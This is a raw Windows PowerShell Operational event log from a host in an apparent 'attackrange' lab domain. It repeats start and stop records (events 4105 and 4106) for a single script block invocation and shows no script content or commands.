User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469026
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469025
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469024
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469023
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469022
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469021
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469020
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469019
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469018
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469017
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469016
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469015
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469014
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469013
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469012
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469011
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469010
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469009
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469008
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469007
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469006
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469005
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469004
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469003
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469002
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469001
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469000
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468999
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468998
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468997
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468996
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468995
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468994
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468993
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468992
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468991
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468990
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468989
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468988
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468987
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468986
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468985
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468984
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468983
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468982
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468981
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468980
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468979
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468978
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468977
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468976
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468975
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468974
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468973
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468972
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468971
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
